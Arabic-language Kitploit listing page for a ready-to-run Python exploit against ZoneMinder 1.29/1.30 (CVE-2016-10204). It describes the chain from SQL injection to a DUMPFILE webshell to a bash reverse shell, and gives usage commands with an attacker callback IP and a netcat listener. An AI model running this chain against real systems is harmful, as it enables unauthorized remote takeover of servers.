Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
zoneminder-1.29-1.30-rce-exploit — حقن SQL غير مُصادَق عليه لاستغلال RCE في ZoneMinder 1.29/1.30 (CVE-2016-10204، EDB-41239). إثبات مفهوم (PoC) بلغة Python لتحويل حقن SQLi بأمر واحد إلى webshell ثم إلى reverse shell. | Kitploit
أدوات/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

حقن SQL غير مُصادَق عليه لاستغلال RCE في ZoneMinder 1.29/1.30 (CVE-2016-10204، EDB-41239). إثبات مفهوم (PoC) بلغة Python لتحويل حقن SQLi بأمر واحد إلى webshell ثم إلى reverse shell.

عرض المستودع
منذ 17س 29دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ZoneMinder 1.29/1.30 SQLi إلى RCE

استغلال Python جاهز للتشغيل لـ ZoneMinder 1.29/1.30 يقوم بتسلسل حقن SQL غير المصادق عليه (CVE-2016-10204، EDB-41239) وصولاً إلى reverse shell تفاعلي.

هذا PoC مسلّح/مؤتمت لثغرة CVE معروفة ومرقّعة، وليس استغلالاً جديداً.

يتوقف PoC الخاص بـ EDB لهذه الثغرة عند حمولة SQLi أو "وجّه sqlmap نحوها." هذا الاستغلال يحزم سلسلة SQLi إلى webshell إلى shell الكاملة في سكربت واحد مقروء.

ما الذي يفعله

  1. يؤكد الحقن عبر فحص قائم على الوقت (SLEEP) على معامل POST limit في index.php?view=request&request=log&task=query.
  2. يكتب webshell PHP صغير في جذر الويب عبر SELECT ... INTO DUMPFILE، محاولاً عدة مسارات شائعة لـ ZoneMinder/Apache.
  3. يتحقق من وجود webshell الحي، ثم يطلق reverse shell بـ bash نحو مستمع netcat الخاص بك.

العقبتان التي يتعامل معهما

  • DUMPFILE، وليس OUTFILE. يقوم OUTFILE بتهريب أسطر جديدة وتشويه PHP متعدد الأسطر؛ بينما يكتب DUMPFILE بايتات خام، فيبقى webshell صالحاً.
  • اسم ملف عشوائي جديد في كل تشغيل. يرفض MySQL الكتابة فوق ملف موجود، لذا يتعارض الاسم الثابت مع إسقاط قديم من تشغيل سابق.

الاستخدام

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

الشكر

  • FOXMOLE (أساس التقرير الاستشاري لـ CVE-2016-10204).
  • PoC الأصلي: Exploit-DB 41239.

الترخيص

MIT، انظر LICENSE.

تنزيل الأداة